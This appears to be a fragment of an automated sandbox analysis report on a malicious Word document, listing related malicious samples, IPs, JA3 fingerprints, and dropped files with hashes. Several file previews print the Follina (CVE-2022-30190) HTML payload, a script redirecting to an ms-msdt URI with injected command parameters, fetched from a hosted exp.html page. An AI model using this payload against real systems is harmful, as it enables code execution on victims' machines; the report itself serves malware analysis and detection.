	https://trk.klclick3.com/ls/click?upn=UaD9A-2F-2FUcB1Y-2BmlWGyK8zQoUuUpG6MI-2F-2BOJEfhRB4O8Q5AU9n7JBkESdBNQckELmLx4cruopC7lWKWeQ3tJBFA-2FBWQAEhHhrTyXk5muEIo70alpUMsDHhKHWeZYTZE0MDFvNPIIB0xUlAaQgdN0Stg-3D-3Dwo8q_cXFzJ7fWxEqUOkRXSXNw8dqdf9NThO25brxiFNzS0eToP-2FOVkE5kUCgdy12nQfEY9cXCZadWTlyf-2BNxHlO1kpdqtZ6bQ8wE4kvW9XT7uR9BpSm9bw2xCFoHx9x7tVuOtZMbI8-2Fx3n9PdsqunwTMgODlOqgKiP2ShIgGZSwCdsalvFGPRNy8WAM1G7A2K8DX2weJn5eqkxdVAEKE7-2FV-2FrcX19-2B-2BrADR-2FulGbEJCcZJuwolCSER3Oi9WqAANwKWjWo0CI6uVzfzTtHbqh3-2FfKNVEE8Z0TpHLc4SUePDZ-2B1-2F2kLGphgYVmJdCC2Qts6Wfp45vk9Y7oezYKCZerzek3tBv6MT91FQ-2BkOOsil5ocEBNENyIgVSQ1Mcv7TdU0F123g-2FminCLTm0ZPqkzqjPfGOAQ-3D-3D#jen@orts.co.za	Get hash	malicious	Browse	145.14.145.1
	QolbxOSpEp.exe	Get hash	malicious	Browse	145.14.145.35
	Swift MT103 PDF.exe	Get hash	malicious	Browse	145.14.144.2
	rNl1OKDDbD.exe	Get hash	malicious	Browse	145.14.144.42
	Nr_SC0551923.js	Get hash	malicious	Browse	145.14.151.96
	https://pythonhero.000webhostapp.com/wp-inlcudes/maximaser/oklasers/penduiguim/redirectv5/anne-gaelle.tabourdeau-carpentier@chantiers-atlantique.com	Get hash	malicious	Browse	145.14.145.59
	SC51072208.js	Get hash	malicious	Browse	145.14.151.96
	QUOTATION SHEET ATTACHED_000848394.exe	Get hash	malicious	Browse	145.14.145.187
	bntnigger.x86	Get hash	malicious	Browse	153.93.58.243
	CtgN5VmJpx	Get hash	malicious	Browse	153.93.242.106
	864448901D066F7FA4835E4C12341D60BF7F610D8C455.exe	Get hash	malicious	Browse	145.14.145.42
	PO_30751122.js	Get hash	malicious	Browse	145.14.151.96
AWEXUS	crmpsl.vir	Get hash	malicious	Browse	153.93.58.250
	Documents for your perusal.js	Get hash	malicious	Browse	145.14.144.149
	agent_tesla.exe	Get hash	malicious	Browse	145.14.145.177
	Agreement documents..js	Get hash	malicious	Browse	145.14.145.177
	9C78846071126D7F29A8B82B699903031D7D2CD837DF9.exe	Get hash	malicious	Browse	145.14.145.22
	CeGxR6XecE	Get hash	malicious	Browse	153.93.242.137
	NC4RB7Mbx9	Get hash	malicious	Browse	153.93.106.234
	lGXq9Y3KxS	Get hash	malicious	Browse	153.93.154.108
	https://trk.klclick3.com/ls/click?upn=UaD9A-2F-2FUcB1Y-2BmlWGyK8zQoUuUpG6MI-2F-2BOJEfhRB4O8Q5AU9n7JBkESdBNQckELmLx4cruopC7lWKWeQ3tJBFA-2FBWQAEhHhrTyXk5muEIo70alpUMsDHhKHWeZYTZE0MDFvNPIIB0xUlAaQgdN0Stg-3D-3Dwo8q_cXFzJ7fWxEqUOkRXSXNw8dqdf9NThO25brxiFNzS0eToP-2FOVkE5kUCgdy12nQfEY9cXCZadWTlyf-2BNxHlO1kpdqtZ6bQ8wE4kvW9XT7uR9BpSm9bw2xCFoHx9x7tVuOtZMbI8-2Fx3n9PdsqunwTMgODlOqgKiP2ShIgGZSwCdsalvFGPRNy8WAM1G7A2K8DX2weJn5eqkxdVAEKE7-2FV-2FrcX19-2B-2BrADR-2FulGbEJCcZJuwolCSER3Oi9WqAANwKWjWo0CI6uVzfzTtHbqh3-2FfKNVEE8Z0TpHLc4SUePDZ-2B1-2F2kLGphgYVmJdCC2Qts6Wfp45vk9Y7oezYKCZerzek3tBv6MT91FQ-2BkOOsil5ocEBNENyIgVSQ1Mcv7TdU0F123g-2FminCLTm0ZPqkzqjPfGOAQ-3D-3D#jen@orts.co.za	Get hash	malicious	Browse	145.14.145.1
	QolbxOSpEp.exe	Get hash	malicious	Browse	145.14.145.35
	Swift MT103 PDF.exe	Get hash	malicious	Browse	145.14.144.2
	rNl1OKDDbD.exe	Get hash	malicious	Browse	145.14.144.42
	Nr_SC0551923.js	Get hash	malicious	Browse	145.14.151.96
	https://pythonhero.000webhostapp.com/wp-inlcudes/maximaser/oklasers/penduiguim/redirectv5/anne-gaelle.tabourdeau-carpentier@chantiers-atlantique.com	Get hash	malicious	Browse	145.14.145.59
	SC51072208.js	Get hash	malicious	Browse	145.14.151.96
	QUOTATION SHEET ATTACHED_000848394.exe	Get hash	malicious	Browse	145.14.145.187
	bntnigger.x86	Get hash	malicious	Browse	153.93.58.243
	CtgN5VmJpx	Get hash	malicious	Browse	153.93.242.106
	864448901D066F7FA4835E4C12341D60BF7F610D8C455.exe	Get hash	malicious	Browse	145.14.145.42
	PO_30751122.js	Get hash	malicious	Browse	145.14.151.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Stainless Steel Plates Sheets and Coil product inquiry.exe	Get hash	malicious	Browse	145.14.144.66
	RFQ-PO821606.doc	Get hash	malicious	Browse	145.14.144.66
	Bank Debit Note.docx	Get hash	malicious	Browse	145.14.144.66
	IRD-N. 9900.xlsx	Get hash	malicious	Browse	145.14.144.66
	IRD-N. 1796.xlsx	Get hash	malicious	Browse	145.14.144.66
	RFQ-PO821606.xlsx	Get hash	malicious	Browse	145.14.144.66
	IRD-N. 8800.xlsx	Get hash	malicious	Browse	145.14.144.66
	IRD-N.#U00ba 0077.xlsx	Get hash	malicious	Browse	145.14.144.66
	Purchase Order_ #U91c7#U8d2d#U8ba2#U5355 PO963296.xlsx	Get hash	malicious	Browse	145.14.144.66
	Commercial Invoice.xlsx	Get hash	malicious	Browse	145.14.144.66
	ORDER PACKAGE.xlsx	Get hash	malicious	Browse	145.14.144.66
	Payment Copy.docx	Get hash	malicious	Browse	145.14.144.66
	SecuriteInfo.com.Exploit.Siggen3.33964.2513.xls	Get hash	malicious	Browse	145.14.144.66
	SecuriteInfo.com.Exploit.Siggen3.33964.2513.xls	Get hash	malicious	Browse	145.14.144.66
	SWIFT Transfer (103) 7923531106220918.docx	Get hash	malicious	Browse	145.14.144.66
	MEXACARE Orders 122001-22.docx	Get hash	malicious	Browse	145.14.144.66
	MEXACARE Orders 122001-22.docx	Get hash	malicious	Browse	145.14.144.66
	DHL DRAFT BL.docx	Get hash	malicious	Browse	145.14.144.66
	PICv45CN2i.xls	Get hash	malicious	Browse	145.14.144.66
	DHL DRAFT BL.docx	Get hash	malicious	Browse	145.14.144.66
7dcce5b76c8b17472d024758970a406b	DATOS-336182433531.xls	Get hash	malicious	Browse	145.14.144.188
	SCAN-028088.pdf.msi	Get hash	malicious	Browse	145.14.144.188
	N02545202624ORF.xls	Get hash	malicious	Browse	145.14.144.188
	1006.xls.xls	Get hash	malicious	Browse	145.14.144.188
	Bank Debit Note.docx	Get hash	malicious	Browse	145.14.144.188
	SCAN-016063.pdf.msi	Get hash	malicious	Browse	145.14.144.188
	3.msi	Get hash	malicious	Browse	145.14.144.188
	2022-06-14_1118.xls	Get hash	malicious	Browse	145.14.144.188
	http://841684.palmitalalimentos.com.br/841684/josh@suckit.com	Get hash	malicious	Browse	145.14.144.188
	SCAN-068589.pdf.msi	Get hash	malicious	Browse	145.14.144.188
	SCAN-287004.pdf.msi	Get hash	malicious	Browse	145.14.144.188
	675748497416145.xls	Get hash	malicious	Browse	145.14.144.188
	Vantageconcept.xls	Get hash	malicious	Browse	145.14.144.188
	O122355422156BV.xls	Get hash	malicious	Browse	145.14.144.188
	2022-06-16_1324.xls	Get hash	malicious	Browse	145.14.144.188
	Iemt.isuzu.co.xls	Get hash	malicious	Browse	145.14.144.188
	DHL-AWB.xlsx	Get hash	malicious	Browse	145.14.144.188
	0102597538535693_1.xls	Get hash	malicious	Browse	145.14.144.188
	100012784973204147_1.xls	Get hash	malicious	Browse	145.14.144.188
	10060423493904881105130_1.xls	Get hash	malicious	Browse	145.14.144.188

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.2874342597765972
Encrypted:	false
SSDEEP:	48:I3o3bRBgl19FHYCa2Mr4zq1UaR2m3kru1cTqSXbdiD+bdiDMH:KoLLgtFX3qlMg0JkykgH
MD5:	EECB7F513E8A53C43004044F5C158663
SHA1:	E7A06F754F530762D0BD2A67FB9648440AB515B8
SHA-256:	00B678470F283CFCC06F70437741FE38CA442D56E5010048877339792E2EF9DF
SHA-512:	F5FAE5D23B2E3F999E782CA3C9D6226771E63B4F6CE907CEC54AA58CD6439BD9231B15F688927EAAE46C87C3C4FE8E526AFEBE769D0BE78BAEC95FDB3D06F995
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.....BI....(..S,...X.F...Fa.q............................0.6..b)I...................-.nK.*.:..v..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{114CD8F4-726A-47E5-81BB-88D492C7D89F}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.671959067718835
Encrypted:	false
SSDEEP:	384:sGm98QdzLhXr6/g5mCSana1UWO3JcHBcH:sGc80zLdp5wUbZK
MD5:	63E4487EB98988D4B91B8B0841A5EFEA
SHA1:	E79BF4DED8B5B8FACEB3C6EFED7A04C3502206AD
SHA-256:	9BF660F43623C7D6B5643938DA3862006A6659E800D5D92B42AA325CF2065ED8
SHA-512:	228BFC89873485FDBEB074B4F083AE74ED9C9526142D1A9A856AD3ED6ED5F3A8655AFF0ABB0D1C5C085D752FB5974F96BC9F1C1658E7AF28C329E402361CF991
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z)...g..G.18q...cS,...X.F...Fa.q............................\.d6R(.F....V............6..hpCI...RT.W..S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.925834115423636
Encrypted:	false
SSDEEP:	3:yVlgsRlzP6RtZDlyYdKllwF01SWg5CR7276:yPblzPMkYClY01Mct22
MD5:	AE4F7D89E4CC88711F34E4CE5FC2A0CB
SHA1:	EA023968F5F6B244EF808399FF978F1BD42E38AF
SHA-256:	FA18BD905873C0C9B2E8F472189D9B55B50027F42AF9E803B83B96C0FC25429B
SHA-512:	CE67AE89690CB9293353E1D60FCF0FDEF72DEC7E9B38B6E4D5BAFC4FCC93269626C6DF6C8AC45085BC42D1D251842535AF901EC9F41889674DEE176D25865A2B
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.1.1.4.C.D.8.F.4.-.7.2.6.A.-.4.7.E.5.-.8.1.B.B.-.8.8.D.4.9.2.C.7.D.8.9.F.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28699215548990653
Encrypted:	false
SSDEEP:	24:I3gyPLC4tB37/qvprNyDbJE1Q8urla+dN7NWsaSHyzNcapZhJPDNRE9IaYl0e5Fu:I3gwRBbFPa+X3acaDzJVrzVhn2rN+CH
MD5:	554E97AB312C5FC57A297F54B0533E95
SHA1:	1BBF3978C3CEC6E78A662DCE1B206B7459262D99
SHA-256:	516879417BA03BBC6BB280A097AA7E6BFEE67F36095DC8AE8BF6910CE0DE707D
SHA-512:	6F254CB3D8233666B0B62FDBFE0B6C6AADB0C18ABFB6947594A8EE2D5ABD5888CA305F8474EEDC13ED8174E573620CC8BEE38DE8F95064786850560740ABAB62
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z...ox..D.X.$.?.oS,...X.F...Fa.q............................F..5.B.`(.}..n........".EK.K.H..tb....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{57B17972-0969-4493-B3CE-7A59E2F01440}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22184607011897017
Encrypted:	false
SSDEEP:	96:KrpCyfiid/9Y/37lX3qX3PyBZfRX3yZRX3yR:C96id0rlX6XmjXWX
MD5:	4F2DCB93190C549F8958691563DA3A4C
SHA1:	E3938FE0E6F5DB87291877F8D14D03A2CB908A95
SHA-256:	A97CF0B600E50C8D5C4FBD180FDD3A789B1FFA00B0D1CDAF68E935B994AD2A9B
SHA-512:	3903ABE11FF08D879A6A08AFD45276FFBD011F4E2E74E379AC9DAD273D2BC6983EE8DA9F32B3A0D8CDF9A1F053155FE98D70D8B28D66DD23C8A495AB656A45EA
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z..w...bB..s4onkES,...X.F...Fa.q...............................V.M.E...CiV.........$.W.(K..ea.#P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.975041488006415
Encrypted:	false
SSDEEP:	3:yVlgsRlzXnl8bIlCQLfIFlS+KG47PUlRiRjl276:yPblzXIIlCLFlS+KGaslwRZ22
MD5:	58B2BB316BC3B1C1A655BA6A6DFF12D7
SHA1:	556B4708A27278350CD3C4DB08652F539F5ED340
SHA-256:	ADBD903757DB3574D73F4B800A8A61CACDC8B489039EB563277A1AC9682FF91D
SHA-512:	D15864874E29AADA8682B6B743E0068E3AD31CCB5E5BEFC6ED23DD15C14446D97B55A29BF4F991A9A5B17A087F2D7296EA7838E81E5E83589DDB338518B7035C
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.5.7.B.1.7.9.7.2.-.0.9.6.9.-.4.4.9.3.-.B.3.C.E.-.7.A.5.9.E.2.F.0.1.4.4.0.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exp[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	1330
Entropy (8bit):	5.429612650770164
Encrypted:	false
SSDEEP:	24:hP+3rIdlFXS8CbM60VM6U2nafNb++Z7LrtsKfAxCtGJ:t+3rIdjKT3FfNBhU
MD5:	19EF3736867C133098F4E4D7FE6A5D36
SHA1:	07730F94E02B06699B8B9B8CD822E9850459D5E8
SHA-256:	D69A3B887DD2D6AB25FC29199E1E7FFFF75E3A68AEBF060F99D2F5DE6D29F778
SHA-512:	A2C469738380E8FC81132579744645D6CA21A41C4ED3C5E24484A5D0A886B59983CF92411A65556019EE5F833DD8E4DC6960530B87690084A0292EC971A8FA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exp[1].htm, Author: Joe Security Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exp[1].htm, Author: Joe Security
Reputation:	low
IE Cache URL:	https://samisoooo.000webhostapp.com/exp.html
Preview:	<!DOCTYPE html>..<html>..<head>..</head>..<body>..<script>...window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO\"";..</script>..<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style><div class="disclaimer">We support Ukraine a

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exp[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	5.429612650770164
Encrypted:	false
SSDEEP:	24:hP+3rIdlFXS8CbM60VM6U2nafNb++Z7LrtsKfAxCtGJ:t+3rIdjKT3FfNBhU
MD5:	19EF3736867C133098F4E4D7FE6A5D36
SHA1:	07730F94E02B06699B8B9B8CD822E9850459D5E8
SHA-256:	D69A3B887DD2D6AB25FC29199E1E7FFFF75E3A68AEBF060F99D2F5DE6D29F778
SHA-512:	A2C469738380E8FC81132579744645D6CA21A41C4ED3C5E24484A5D0A886B59983CF92411A65556019EE5F833DD8E4DC6960530B87690084A0292EC971A8FA35
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>..<html>..<head>..</head>..<body>..<script>...window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO\"";..</script>..<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style><div class="disclaimer">We support Ukraine a

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B18D662.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	5.429612650770164
Encrypted:	false
SSDEEP:	24:hP+3rIdlFXS8CbM60VM6U2nafNb++Z7LrtsKfAxCtGJ:t+3rIdjKT3FfNBhU
MD5:	19EF3736867C133098F4E4D7FE6A5D36
SHA1:	07730F94E02B06699B8B9B8CD822E9850459D5E8
SHA-256:	D69A3B887DD2D6AB25FC29199E1E7FFFF75E3A68AEBF060F99D2F5DE6D29F778
SHA-512:	A2C469738380E8FC81132579744645D6CA21A41C4ED3C5E24484A5D0A886B59983CF92411A65556019EE5F833DD8E4DC6960530B87690084A0292EC971A8FA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B18D662.htm, Author: Joe Security
Reputation:	low
Preview:	<!DOCTYPE html>..<html>..<head>..</head>..<body>..<script>...window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO\"";..</script>..<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style><div class="disclaimer">We support Ukraine a

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\475C6E34.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 5 x 65536 x 0 "\004"
Category:	dropped
Size (bytes):	52
Entropy (8bit):	1.8614575055208968
Encrypted:	false
SSDEEP:	3:Vm1olpUktK0Xg/lrll0:MW6kK0XgtI
MD5:	07FFEFF17A8A1A1209AB3C2690D569D4
SHA1:	37CB513FABDDCDBBAA2E7296B31A4BC9832E1B01
SHA-256:	57CFA30BB860B95B7012ED62427025959B671D270AAF67FC406FBC3C4F3C48D4
SHA-512:	743591E7BFE9936EEE057C9D1769595D48C90BA28057D8EBD0F7299B8FCACD7B8FA50AF30BD0B8B6E09F77ADE16B47D6F0ABB079D60E975443A57C514099AD86
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83FA24C0.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	5.429612650770164
Encrypted:	false
SSDEEP:	24:hP+3rIdlFXS8CbM60VM6U2nafNb++Z7LrtsKfAxCtGJ:t+3rIdjKT3FfNBhU
MD5:	19EF3736867C133098F4E4D7FE6A5D36
SHA1:	07730F94E02B06699B8B9B8CD822E9850459D5E8
SHA-256:	D69A3B887DD2D6AB25FC29199E1E7FFFF75E3A68AEBF060F99D2F5DE6D29F778
SHA-512:	A2C469738380E8FC81132579744645D6CA21A41C4ED3C5E24484A5D0A886B59983CF92411A65556019EE5F833DD8E4DC6960530B87690084A0292EC971A8FA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83FA24C0.htm, Author: Joe Security
Reputation:	low
Preview:	<!DOCTYPE html>..<html>..<head>..</head>..<body>..<script>...window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO\"";..</script>..<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style><div class="disclaimer">We support Ukraine a

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6A2553F.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	74
Entropy (8bit):	2.117514616373907
Encrypted:	false
SSDEEP:	3:t/Wlsl81olpUktK0Xg/lrll0:t/d8W6kK0XgtI
MD5:	C4E6B3035AC3828D375E5479E8485D0D
SHA1:	624B2E68B669293CE5EF5EDA4EFCFDE97FFEA84A
SHA-256:	591890CBBED60EF32252835A3F13362E9204F1088E5EFA9E164A3526B612C4D7
SHA-512:	1864A7CBF1C5205F0D1CAC9DA5CA4E8F103B9C045913A98B8A9DA62B3850AB842913235BF38DA6C7D78ECE985D35EBC8F6C15471B5C2FE23A6A4BBF66A03E4DB
Malicious:	false
Preview:	.............`.....qW....................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{71B1CDC1-773F-473E-BD67-B44520A9E1A7}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	2.51113310539896
Encrypted:	false
SSDEEP:	48:rgg5/vnpEYnwvnpqYnavnpqYnGEYYvnpxYn2N4vnpKvnrF+YnkvjWp+Yn:MieehhN+MFD
MD5:	56E41FB4B3E7501317954EDAF4F3066A
SHA1:	E9AE9F4DBBF51710B4671AF250B8364BD192B9C0
SHA-256:	02E94814AF6D6F1E738A173EEE6A0890481085F115C8591CCC4921F5A8027DF4
SHA-512:	FE8636C2FC8FA636587E9768E542C1F8285D4DCB93C75B29A7260C976646E128DDE09601EF7CD6ECD48D8D259DED289B9F493BAA395568C3557F9088544B3944
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4E26B072-EAB3-41AA-AF89-735B4390C5D9}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3155A32-4109-4836-B85D-FBC05DE1F998}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	0.9785273004090764
Encrypted:	false
SSDEEP:	6:FlgI5lNcYOhMlvKE6DIsFQuK/Oykt9uvUBP/4PxZUtOD+6:FlvO64EhsK9fu/GZXr
MD5:	F0C0E203E2AC15026E3490F58536641D
SHA1:	92869BD6CDC12A6C62B6B3923E5C4BE3696A6C62
SHA-256:	AB9D778B11E59A9CF88AE75D128AAC8713D6BEF146E3E96BF5BAA446C1032AD8
SHA-512:	8EF294FBB0D8108107B8E41B7F2AE506C000846EDA00E6E2D84C3CEABEB0FE6038330244D17B3FEB7DE8200DDE8D56037F5BC73ED8A128A539F40BBA18A0DEEB
Malicious:	false
Preview:	....L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.s.:././.s.a.m.i.s.o.o.o.o...0.0.0.w.e.b.h.o.s.t.a.p.p...c.o.m./.e.x.p...h.t.m.l.". .".". .\.a. .\.p. .\.f. .0..... . .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{87A0ADDF-EA5F-47F4-8528-A6B8AB0136F3}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.0255829556424752
Encrypted:	false
SSDEEP:	6:I3DPcb4BPKavxggLRtteRSy6SmpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPU4BlWX6SmHvYg3J/
MD5:	CD2905870C9640C3CDDD24039502D603
SHA1:	FEB2AB2BAB584E081AA1284CEA7DA0CBCEB02E24
SHA-256:	8A8F798CF9439E63F29C4FA60C60C27CFD6B4FD1105141C9590B6AF772CCBA4B
